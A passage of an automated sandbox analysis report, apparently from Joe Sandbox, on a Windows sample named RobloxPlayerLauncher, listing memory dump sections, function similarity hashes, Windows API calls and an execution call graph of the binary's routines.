              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ByteCharMultiWide$ErrorLast
              • String ID:
              • API String ID: 1717984340-0
              • Opcode ID: c1c5385418392e8f87e3c1943553acc18012892f6346dab3d9a6c54c88a8a4ea
              • Instruction ID: b4d84ec86d5e588da7a49d6cb4c71f6b18cf49bf0fb3342568856af0c287df21
              • Opcode Fuzzy Hash: c1c5385418392e8f87e3c1943553acc18012892f6346dab3d9a6c54c88a8a4ea
              • Instruction Fuzzy Hash: 0E412471600219FBDB109E68EC45FAABB6EFF21350F604125FD08DA582DB76AD20C7A0
              APIs
              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,0074A25D,?,3FFFFFFF,?,?,?), ref: 0074BC9D
              • HeapFree.KERNEL32(00000000,?,?,00000000,?,0074A25D,?,3FFFFFFF,?,?,?), ref: 0074BCA4
              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,0074A25D,?,3FFFFFFF,?,?,?), ref: 0074BCC9
              • HeapFree.KERNEL32(00000000,?,?,00000000,?,0074A25D,?,3FFFFFFF,?,?,?), ref: 0074BCD0
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Heap$FreeProcess
              • String ID:
              • API String ID: 3859560861-0
              • Opcode ID: e13fd191faa818fe9c2110d43a3b253eec779a9419b3e6cfec90cae08bdd922e
              • Instruction ID: 512222a3f6d01c0830684f23d8fd5a0ccee95eb6aa6e6d7186eb0971da798527
              • Opcode Fuzzy Hash: e13fd191faa818fe9c2110d43a3b253eec779a9419b3e6cfec90cae08bdd922e
              • Instruction Fuzzy Hash: 1A01B9796053109FDB208F99DC8875A7BA8FF8A732F054559F5198B290CB759C02CBF0

              Execution Graph

              Execution Coverage:9.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:3.5%
              Total number of Nodes:1493
              Total number of Limit Nodes:33
              execution_graph 22844 b679b7 22855 b6b290 22844->22855 22849 b679d4 22851 b684de _free 20 API calls 22849->22851 22852 b67a09 22851->22852 22853 b679df 22872 b684de 22853->22872 22856 b679c9 22855->22856 22857 b6b299 22855->22857 22859 b6b610 GetEnvironmentStringsW 22856->22859 22878 b6b188 22857->22878 22860 b6b627 22859->22860 22870 b6b67a 22859->22870 22863 b6b62d WideCharToMultiByte 22860->22863 22861 b6b683 FreeEnvironmentStringsW 22862 b679ce 22861->22862 22862->22849 22871 b67a0f 26 API calls 3 library calls 22862->22871 22864 b6b649 22863->22864 22863->22870 22865 b68518 __vsnwprintf_l 21 API calls 22864->22865 22866 b6b64f 22865->22866 22867 b6b656 WideCharToMultiByte 22866->22867 22868 b6b66c 22866->22868 22867->22868 22869 b684de _free 20 API calls 22868->22869 22869->22870 22870->22861 22870->22862 22871->22853 22873 b684e9 RtlFreeHeap 22872->22873 22877 b68512 __dosmaperr 22872->22877 22874 b684fe 22873->22874 22873->22877 23065 b6895a 20 API calls __dosmaperr 22874->23065 22876 b68504 GetLastError 22876->22877 22877->22849 22898 b68fa5 GetLastError 22878->22898 22880 b6b195 22919 b6b2ae 22880->22919 22882 b6b19d 22928 b6af1b 22882->22928 22885 b6b1b4 22885->22856 22890 b684de _free 20 API calls 22890->22885 22891 b6b1f2 22952 b6895a 20 API calls __dosmaperr 22891->22952 22893 b6b1f7 22893->22890 22894 b6b20f 22895 b6b23b 22894->22895 22896 b684de _free 20 API calls 22894->22896 22895->22893 22953 b6adf1 26 API calls 22895->22953 22896->22895 22899 b68fc7 22898->22899 22900 b68fbb 22898->22900 22955 b685a9 20 API calls 2 library calls 22899->22955 22954 b6a61b 11 API calls 2 library calls 22900->22954 22903 b68fc1 22903->22899 22905 b69010 SetLastError 22903->22905 22904 b68fd3 22911 b68fdb 22904->22911 22956 b6a671 11 API calls 2 library calls 22904->22956 22905->22880 22907 b684de _free 20 API calls 22909 b68fe1 22907->22909 22908 b68ff0 22910 b68ff7 22908->22910 22908->22911 22913 b6901c SetLastError 22909->22913 22957 b68e16 20 API calls __dosmaperr 22910->22957 22911->22907 22958 b68566 38 API calls _abort 22913->22958 22914 b69002 22916 b684de _free 20 API calls 22914->22916 22918 b69009 22916->22918 22918->22905 22918->22913 22920 b6b2ba ___FrameUnwindToState 22919->22920 22921 b68fa5 pre_c_initialization 38 API calls 22920->22921 22926 b6b2c4 22921->22926 22923 b6b348 ___FrameUnwindToState 22923->22882 22926->22923 22927 b684de _free 20 API calls 22926->22927 22959 b68566 38 API calls _abort 22926->22959 22960 b6a3f1 EnterCriticalSection 22926->22960 22961 b6b33f LeaveCriticalSection _abort 22926->22961 22927->22926 22962 b63dd6 22928->22962 22931 b6af4e 22933 b6af65 22931->22933 22934 b6af53 GetACP 22931->22934 22932 b6af3c GetOEMCP 22932->22933 22933->22885 22935 b68518 22933->22935 22934->22933 22936 b68556 22935->22936 22940 b68526 __dosmaperr 22935->22940 22973 b6895a 20 API calls __dosmaperr 22936->22973 22937 b68541 RtlAllocateHeap 22939 b68554 22937->22939 22937->22940 22939->22893 22942 b6b350 22939->22942 22940->22936 22940->22937 22972 b671ad 7 API calls 2 library calls 22940->22972 22943 b6af1b 40 API calls 22942->22943 22944 b6b36f 22943->22944 22947 b6b3c0 IsValidCodePage 22944->22947 22949 b6b376 22944->22949 22951 b6b3e5 ___scrt_get_show_window_mode 22944->22951 22946 b6b1ea 22946->22891 22946->22894 22948 b6b3d2 GetCPInfo 22947->22948 22947->22949 22948->22949 22948->22951 22984 b5ec4a 22949->22984 22974 b6aff4 GetCPInfo 22951->22974 22952->22893 22953->22893 22954->22903 22955->22904 22956->22908 22957->22914 22960->22926 22961->22926 22963 b63df3 22962->22963 22964 b63de9 22962->22964 22963->22964 22965 b68fa5 pre_c_initialization 38 API calls 22963->22965 22964->22931 22964->22932 22966 b63e14 22965->22966 22970 b690fa 38 API calls __cftof 22966->22970 22968 b63e2d 22971 b69127 38 API calls __cftof 22968->22971 22970->22968 22971->22964 22972->22940 22973->22939 22980 b6b02e 22974->22980 22983 b6b0d8 22974->22983 22977 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22979 b6b184 22977->22979 22979->22949 22991 b6c099 22980->22991 22982 b6a275 __vsnwprintf_l 43 API calls 22982->22983 22983->22977 22985 b5ec55 IsProcessorFeaturePresent 22984->22985 22986 b5ec53 22984->22986 22988 b5f267 22985->22988 22986->22946 23064 b5f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22988->23064 22990 b5f34a 22990->22946 22992 b63dd6 __cftof 38 API calls 22991->22992 22993 b6c0b9 MultiByteToWideChar 22992->22993 22995 b6c18f 22993->22995 22996 b6c0f7 22993->22996 22997 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22995->22997 22998 b68518 __vsnwprintf_l 21 API calls 22996->22998 23001 b6c118 __vsnwprintf_l ___scrt_get_show_window_mode 22996->23001 22999 b6b08f 22997->22999 22998->23001 23005 b6a275 22999->23005 23000 b6c189 23010 b6a2c0 20 API calls _free 23000->23010 23001->23000 23003 b6c15d MultiByteToWideChar 23001->23003 23003->23000 23004 b6c179 GetStringTypeW 23003->23004 23004->23000 23006 b63dd6 __cftof 38 API calls 23005->23006 23007 b6a288 23006->23007 23011 b6a058 23007->23011 23010->22995 23012 b6a073 __vsnwprintf_l 23011->23012 23013 b6a099 MultiByteToWideChar 23012->23013 23014 b6a0c3 23013->23014 23024 b6a24d 23013->23024 23015 b6a0e4 __vsnwprintf_l 23014->23015 23018 b68518 __vsnwprintf_l 21 API calls 23014->23018 23019 b6a12d MultiByteToWideChar 23015->23019 23034 b6a199 23015->23034 23016 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23017 b6a260 23016->23017 23017->22982 23018->23015 23020 b6a146 23019->23020 23019->23034 23038 b6a72c 23020->23038 23024->23016 23025 b6a170 23029 b6a72c __vsnwprintf_l 11 API calls 23025->23029 23025->23034 23026 b6a1a8 23027 b68518 __vsnwprintf_l 21 API calls 23026->23027 23032 b6a1c9 __vsnwprintf_l 23026->23032 23027->23032 23028 b6a23e 23046 b6a2c0 20 API calls _free 23028->23046 23029->23034 23030 b6a72c __vsnwprintf_l 11 API calls 23033 b6a21d 23030->23033 23032->23028 23032->23030 23033->23028 23035 b6a22c WideCharToMultiByte 23033->23035 23047 b6a2c0 20 API calls _free 23034->23047 23035->23028 23036 b6a26c 23035->23036 23048 b6a2c0 20 API calls _free 23036->23048 23049 b6a458 23038->23049 23042 b6a75c 23044 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23042->23044 23043 b6a79c LCMapStringW 23043->23042 23045 b6a15d 23044->23045 23045->23025 23045->23026 23045->23034 23046->23034 23047->23024 23048->23034 23050 b6a488 23049->23050 23051 b6a484 23049->23051 23050->23042 23056 b6a7b4 10 API calls 3 library calls 23050->23056 23051->23050 23052 b6a4a8 23051->23052 23057 b6a4f4 23051->23057 23052->23050 23054 b6a4b4 GetProcAddress 23052->23054 23055 b6a4c4 __crt_fast_encode_pointer 23054->23055 23055->23050 23056->23043 23058 b6a515 LoadLibraryExW 23057->23058 23063 b6a50a 23057->23063 23059 b6a532 GetLastError 23058->23059 23060 b6a54a 23058->23060 23059->23060 23061 b6a53d LoadLibraryExW 23059->23061 23062 b6a561 FreeLibrary 23060->23062 23060->23063 23061->23060 23062->23063 23063->23051 23064->22990 23065->22876 24753 b416b0 84 API calls 23067 b690b0 23075 b6a56f 23067->23075 23070 b690c4 23072 b690cc 23073 b690d9 23072->23073 23083 b690e0 11 API calls 23072->23083 23076 b6a458 __dosmaperr 5 API calls 23075->23076 23077 b6a596 23076->23077 23078 b6a5ae TlsAlloc 23077->23078 23079 b6a59f 23077->23079 23078->23079 23080 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23079->23080 23081 b690ba 23080->23081 23081->23070 23082 b69029 20 API calls 2 library calls 23081->23082 23082->23072 23083->23070 23084 b6a3b0 23085 b6a3bb 23084->23085 23087 b6a3e4 23085->23087 23088 b6a3e0 23085->23088 23090 b6a6ca 23085->23090 23097 b6a410 DeleteCriticalSection 23087->23097 23091 b6a458 __dosmaperr 5 API calls 23090->23091 23092 b6a6f1 23091->23092 23093 b6a70f InitializeCriticalSectionAndSpinCount 23092->23093 23094 b6a6fa 23092->23094 23093->23094 23095 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23094->23095 23096 b6a726 23095->23096 23096->23085 23097->23088 24754 b61eb0 6 API calls 4 library calls 24755 b676bd 52 API calls 3 library calls 24757 b496a0 79 API calls 24807 b6e9a0 51 API calls 24760 b5e4a2 38 API calls ___FrameUnwindToState 24809 b62397 48 API calls 23118 b5d997 23120 b5d89b 23118->23120 23121 b5df59 23120->23121 23149 b5dc67 23121->23149 23123 b5df73 23124 b5dfd0 23123->23124 23137 b5dff4 23123->23137 23125 b5ded7 DloadReleaseSectionWriteAccess 11 API calls 23124->23125 23126 b5dfdb RaiseException 23125->23126 23127 b5e1c9 23126->23127 23129 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23127->23129 23128 b5e06c LoadLibraryExA 23130 b5e0cd 23128->23130 23131 b5e07f GetLastError 23128->23131 23132 b5e1d8 23129->23132 23133 b5e0d8 FreeLibrary 23130->23133 23135 b5e0df 23130->23135 23134 b5e0a8 23131->23134 23146 b5e092 23131->23146 23132->23120 23133->23135 23138 b5ded7 DloadReleaseSectionWriteAccess 11 API calls 23134->23138 23136 b5e13d GetProcAddress 23135->23136 23142 b5e19b 23135->23142 23139 b5e14d GetLastError 23136->23139 23136->23142 23137->23128 23137->23130 23137->23135 23137->23142 23140 b5e0b3 RaiseException 23138->23140 23144 b5e160 23139->23144 23140->23127 23160 b5ded7 23142->23160 23143 b5ded7 DloadReleaseSectionWriteAccess 11 API calls 23145 b5e181 RaiseException 23143->23145 23144->23142 23144->23143 23147 b5dc67 ___delayLoadHelper2@8 11 API calls 23145->23147 23146->23130 23146->23134 23148 b5e198 23147->23148 23148->23142 23150 b5dc73 23149->23150 23151 b5dc99 23149->23151 23168 b5dd15 23150->23168 23151->23123 23154 b5dc94 23178 b5dc9a 23154->23178 23157 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23158 b5df55 23157->23158 23158->23123 23159 b5df24 23159->23157 23161 b5dee9 23160->23161 23162 b5df0b 23160->23162 23163 b5dd15 DloadLock 8 API calls 23161->23163 23162->23127 23164 b5deee 23163->23164 23165 b5df06 23164->23165 23166 b5de67 DloadProtectSection 3 API calls 23164->23166 23187 b5df0f 8 API calls 2 library calls 23165->23187 23166->23165 23169 b5dc9a DloadLock 3 API calls 23168->23169 23170 b5dd2a 23169->23170 23171 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23170->23171 23172 b5dc78 23171->23172 23172->23154 23173 b5de67 23172->23173 23175 b5de7c DloadObtainSection 23173->23175 23174 b5deb7 VirtualProtect 23176 b5de82 23174->23176 23175->23174 23175->23176 23186 b5dd72 VirtualQuery GetSystemInfo 23175->23186 23176->23154 23179 b5dca7 23178->23179 23180 b5dcab 23178->23180 23179->23159 23181 b5dcb3 GetModuleHandleW 23180->23181 23182 b5dcaf 23180->23182 23183 b5dcc5 23181->23183 23184 b5dcc9 GetProcAddress 23181->23184 23182->23159 23183->23159 23184->23183 23185 b5dcd9 GetProcAddress 23184->23185 23185->23183 23186->23174 23187->23162 23188 b5d891 19 API calls ___delayLoadHelper2@8 24762 b57090 114 API calls 24763 b5cc90 70 API calls 24810 b5a990 97 API calls 24811 b59b90 GdipCloneImage GdipAlloc 24812 b69b90 21 API calls 2 library calls 24765 b5a89d 78 API calls 24766 b4ea98 FreeLibrary 23194 b41385 82 API calls 3 library calls 24767 b6ac0e 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24814 b65780 QueryPerformanceFrequency QueryPerformanceCounter 24816 b5ebf7 20 API calls 24818 b6abfd 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23386 b5e1f9 23387 b5e203 23386->23387 23388 b5df59 ___delayLoadHelper2@8 19 API calls 23387->23388 23389 b5e210 23388->23389 23392 b5aee0 23393 b5aeea __EH_prolog 23392->23393 23555 b4130b 23393->23555 23396 b5af2c 23400 b5afa2 23396->23400 23401 b5af39 23396->23401 23427 b5af18 23396->23427 23397 b5b5cb 23627 b5cd2e 23397->23627 23404 b5b041 GetDlgItemTextW 23400->23404 23410 b5afbc 23400->23410 23405 b5af75 23401->23405 23406 b5af3e 23401->23406 23402 b5b5f7 23408 b5b611 GetDlgItem SendMessageW 23402->23408 23409 b5b600 SendDlgItemMessageW 23402->23409 23403 b5b5e9 SendMessageW 23403->23402 23404->23405 23407 b5b077 23404->23407 23411 b5af96 KiUserCallbackDispatcher 23405->23411 23405->23427 23415 b4ddd1 53 API calls 23406->23415 23406->23427 23412 b5b08f GetDlgItem 23407->23412 23552 b5b080 23407->23552 23645 b59da4 GetCurrentDirectoryW 23408->23645 23409->23408 23414 b4ddd1 53 API calls 23410->23414 23411->23427 23418 b5b0c5 SetFocus 23412->23418 23419 b5b0a4 SendMessageW SendMessageW 23412->23419 23420 b5afde SetDlgItemTextW 23414->23420 23416 b5af58 23415->23416 23667 b41241 SHGetMalloc 23416->23667 23417 b5b641 GetDlgItem 23422 b5b664 SetWindowTextW 23417->23422 23423 b5b65e 23417->23423 23424 b5b0d5 23418->23424 23436 b5b0ed 23418->23436 23419->23418 23425 b5afec 23420->23425 23646 b5a2c7 GetClassNameW 23422->23646 23423->23422 23430 b4ddd1 53 API calls 23424->23430 23425->23427 23434 b5aff9 GetMessageW 23425->23434 23426 b5af5f 23426->23427 23431 b5af63 SetDlgItemTextW 23426->23431 23428 b5b56b 23432 b4ddd1 53 API calls 23428->23432 23435 b5b0df 23430->23435 23431->23427 23437 b5b57b SetDlgItemTextW 23432->23437 23434->23427 23439 b5b010 IsDialogMessageW 23434->23439 23668 b5cb5a 23435->23668 23444 b4ddd1 53 API calls 23436->23444 23442 b5b58f 23437->23442 23439->23425 23441 b5b01f TranslateMessage DispatchMessageW 23439->23441 23441->23425 23447 b4ddd1 53 API calls 23442->23447 23446 b5b124 23444->23446 23445 b5b6af 23454 b4ddd1 53 API calls 23445->23454 23456 b5b6df 23445->23456 23449 b4400a _swprintf 51 API calls 23446->23449 23450 b5b5b8 23447->23450 23448 b5bdf5 98 API calls 23448->23445 23455 b5b136 23449->23455 23457 b4ddd1 53 API calls 23450->23457 23451 b5b0e6 23565 b4a04f 23451->23565 23461 b5b6c2 SetDlgItemTextW 23454->23461 23462 b5cb5a 16 API calls 23455->23462 23463 b5bdf5 98 API calls 23456->23463 23491 b5b797 23456->23491 23457->23427 23458 b5b847 23464 b5b850 EnableWindow 23458->23464 23465 b5b859 23458->23465 23459 b5b174 GetLastError 23460 b5b17f 23459->23460 23571 b5a322 SetCurrentDirectoryW 23460->23571 23467 b4ddd1 53 API calls 23461->23467 23462->23451 23468 b5b6fa 23463->23468 23464->23465 23469 b5b876 23465->23469 23686 b412c8 GetDlgItem EnableWindow 23465->23686 23471 b5b6d6 SetDlgItemTextW 23467->23471 23477 b5b70c 23468->23477 23492 b5b731 23468->23492 23476 b5b89d 23469->23476 23485 b5b895 SendMessageW 23469->23485 23470 b5b195 23474 b5b1ac 23470->23474 23475 b5b19e GetLastError 23470->23475 23471->23456 23473 b5b78a 23480 b5bdf5 98 API calls 23473->23480 23484 b5b227 23474->23484 23487 b5b237 23474->23487 23489 b5b1c4 GetTickCount 23474->23489 23475->23474 23476->23427 23481 b4ddd1 53 API calls 23476->23481 23684 b59635 32 API calls 23477->23684 23479 b5b86c 23687 b412c8 GetDlgItem EnableWindow 23479->23687 23480->23491 23486 b5b8b6 SetDlgItemTextW 23481->23486 23482 b5b725 23482->23492 23484->23487 23488 b5b46c 23484->23488 23485->23476 23486->23427 23494 b5b407 23487->23494 23495 b5b24f GetModuleFileNameW 23487->23495 23587 b412e6 GetDlgItem ShowWindow 23488->23587 23496 b4400a _swprintf 51 API calls 23489->23496 23490 b5b825 23685 b59635 32 API calls 23490->23685 23491->23458 23491->23490 23499 b4ddd1 53 API calls 23491->23499 23492->23473 23500 b5bdf5 98 API calls 23492->23500 23494->23405 23507 b4ddd1 53 API calls 23494->23507 23678 b4eb3a 80 API calls 23495->23678 23503 b5b1dd 23496->23503 23498 b5b844 23498->23458 23499->23491 23504 b5b75f 23500->23504 23501 b5b47c 23588 b412e6 GetDlgItem ShowWindow 23501->23588 23572 b4971e 23503->23572 23504->23473 23509 b5b768 DialogBoxParamW 23504->23509 23506 b5b275 23511 b4400a _swprintf 51 API calls 23506->23511 23508 b5b41b 23507->23508 23512 b4400a _swprintf 51 API calls 23508->23512 23509->23405 23509->23473 23510 b5b486 23514 b4ddd1 53 API calls 23510->23514 23515 b5b297 CreateFileMappingW 23511->23515 23517 b5b439 23512->23517 23519 b5b490 SetDlgItemTextW 23514->23519 23516 b5b2f9 GetCommandLineW 23515->23516 23549 b5b376 __vswprintf_c_l 23515->23549 23521 b5b30a 23516->23521 23531 b4ddd1 53 API calls 23517->23531 23518 b5b203 23522 b5b215 23518->23522 23523 b5b20a GetLastError 23518->23523 23589 b412e6 GetDlgItem ShowWindow 23519->23589 23679 b5ab2e SHGetMalloc 23521->23679 23580 b49653 23522->23580 23523->23522 23524 b5b381 ShellExecuteExW 23544 b5b39e 23524->23544 23525 b5b4a2 SetDlgItemTextW GetDlgItem 23528 b5b4d7 23525->23528 23529 b5b4bf GetWindowLongW SetWindowLongW 23525->23529 23590 b5bdf5 23528->23590 23529->23528 23530 b5b326 23680 b5ab2e SHGetMalloc 23530->23680 23531->23405 23535 b5b332 23681 b5ab2e SHGetMalloc 23535->23681 23536 b5b3e1 23536->23494 23543 b5b3f7 UnmapViewOfFile CloseHandle 23536->23543 23537 b5bdf5 98 API calls 23539 b5b4f3 23537->23539 23615 b5d0f5 23539->23615 23540 b5b33e 23682 b4ecad 80 API calls ___scrt_get_show_window_mode 23540->23682 23543->23494 23544->23536 23547 b5b3cd Sleep 23544->23547 23546 b5b355 MapViewOfFile 23546->23549 23547->23536 23547->23544 23548 b5bdf5 98 API calls 23553 b5b519 23548->23553 23549->23524 23550 b5b542 23683 b412c8 GetDlgItem EnableWindow 23550->23683 23552->23405 23552->23428 23553->23550 23554 b5bdf5 98 API calls 23553->23554 23554->23550 23556 b41314 23555->23556 23557 b4136d 23555->23557 23558 b4137a 23556->23558 23688 b4da98 62 API calls 2 library calls 23556->23688 23689 b4da71 GetWindowLongW SetWindowLongW 23557->23689 23558->23396 23558->23397 23558->23427 23561 b41336 23561->23558 23562 b41349 GetDlgItem 23561->23562 23562->23558 23563 b41359 23562->23563 23563->23558 23564 b4135f SetWindowTextW 23563->23564 23564->23558 23568 b4a059 23565->23568 23566 b4a0ea 23567 b4a207 9 API calls 23566->23567 23569 b4a113 23566->23569 23567->23569 23568->23566 23568->23569 23690 b4a207 23568->23690 23569->23459 23569->23460 23571->23470 23573 b49728 23572->23573 23574 b49792 CreateFileW 23573->23574 23575 b49786 23573->23575 23574->23575 23576 b497e4 23575->23576 23577 b4b66c 2 API calls 23575->23577 23576->23518 23578 b497cb 23577->23578 23578->23576 23579 b497cf CreateFileW 23578->23579 23579->23576 23581 b49688 23580->23581 23582 b49677 23580->23582 23581->23484 23582->23581 23583 b49683 23582->23583 23584 b4968a 23582->23584 23711 b49817 23583->23711 23716 b496d0 23584->23716 23587->23501 23588->23510 23589->23525 23591 b5bdff __EH_prolog 23590->23591 23592 b5b4e5 23591->23592 23593 b5aa36 ExpandEnvironmentStringsW 23591->23593 23592->23537 23604 b5be36 _wcsrchr 23593->23604 23595 b5aa36 ExpandEnvironmentStringsW 23595->23604 23596 b5c11d SetWindowTextW 23596->23604 23599 b635de 22 API calls 23599->23604 23601 b5bf0b SetFileAttributesW 23603 b5bfc5 GetFileAttributesW 23601->23603 23614 b5bf25 ___scrt_get_show_window_mode 23601->23614 23603->23604 23606 b5bfd7 DeleteFileW 23603->23606 23604->23592 23604->23595 23604->23596 23604->23599 23604->23601 23607 b5c2e7 GetDlgItem SetWindowTextW SendMessageW 23604->23607 23610 b5c327 SendMessageW 23604->23610 23731 b517ac CompareStringW 23604->23731 23732 b59da4 GetCurrentDirectoryW 23604->23732 23734 b4a52a 7 API calls 23604->23734 23735 b4a4b3 FindClose 23604->23735 23736 b5ab9a 76 API calls new 23604->23736 23606->23604 23608 b5bfe8 23606->23608 23607->23604 23609 b4400a _swprintf 51 API calls 23608->23609 23611 b5c008 GetFileAttributesW 23609->23611 23610->23604 23611->23608 23612 b5c01d MoveFileW 23611->23612 23612->23604 23613 b5c035 MoveFileExW 23612->23613 23613->23604 23614->23603 23614->23604 23733 b4b4f7 52 API calls 2 library calls 23614->23733 23616 b5d0ff __EH_prolog 23615->23616 23737 b4fead 23616->23737 23618 b5d130 23741 b45c59 23618->23741 23620 b5d14e 23745 b47c68 23620->23745 23624 b5d1a1 23762 b47cfb 23624->23762 23626 b5b504 23626->23548 23628 b5cd38 23627->23628 24235 b59d1a 23628->24235 23631 b5cd45 GetWindow 23632 b5b5d1 23631->23632 23633 b5cd65 23631->23633 23632->23402 23632->23403 23633->23632 23634 b5cd72 GetClassNameW 23633->23634 23636 b5cd96 GetWindowLongW 23633->23636 23637 b5cdfa GetWindow 23633->23637 24240 b517ac CompareStringW 23634->24240 23636->23637 23638 b5cda6 SendMessageW 23636->23638 23637->23632 23637->23633 23638->23637 23639 b5cdbc GetObjectW 23638->23639 24241 b59d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23639->24241 23641 b5cdd3 24242 b59d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23641->24242 24243 b59f5d 8 API calls ___scrt_get_show_window_mode 23641->24243 23644 b5cde4 SendMessageW DeleteObject 23644->23637 23645->23417 23647 b5a30d 23646->23647 23648 b5a2e8 23646->23648 23650 b5a312 SHAutoComplete 23647->23650 23651 b5a31b 23647->23651 24246 b517ac CompareStringW 23648->24246 23650->23651 23654 b5a7c3 23651->23654 23652 b5a2fb 23652->23647 23653 b5a2ff FindWindowExW 23652->23653 23653->23647 23655 b5a7cd __EH_prolog 23654->23655 23656 b41380 82 API calls 23655->23656 23657 b5a7ef 23656->23657 24247 b41f4f 23657->24247 23660 b5a809 23662 b41631 84 API calls 23660->23662 23661 b5a818 23663 b41951 126 API calls 23661->23663 23664 b5a814 23662->23664 23666 b5a83a __vswprintf_c_l new 23663->23666 23664->23445 23664->23448 23665 b41631 84 API calls 23665->23664 23666->23664 23666->23665 23667->23426 23669 b5ac74 5 API calls 23668->23669 23670 b5cb66 GetDlgItem 23669->23670 23671 b5cbbc SendMessageW SendMessageW 23670->23671 23672 b5cb88 23670->23672 23673 b5cc17 SendMessageW SendMessageW SendMessageW 23671->23673 23674 b5cbf8 23671->23674 23677 b5cb93 ShowWindow SendMessageW SendMessageW 23672->23677 23675 b5cc6d SendMessageW 23673->23675 23676 b5cc4a SendMessageW 23673->23676 23674->23673 23675->23451 23676->23675 23677->23671 23678->23506 23679->23530 23680->23535 23681->23540 23682->23546 23683->23552 23684->23482 23685->23498 23686->23479 23687->23469 23688->23561 23689->23558 23691 b4a214 23690->23691 23692 b4a238 23691->23692 23693 b4a22b CreateDirectoryW 23691->23693 23694 b4a180 4 API calls 23692->23694 23693->23692 23695 b4a26b 23693->23695 23696 b4a23e 23694->23696 23699 b4a27a 23695->23699 23703 b4a444 23695->23703 23697 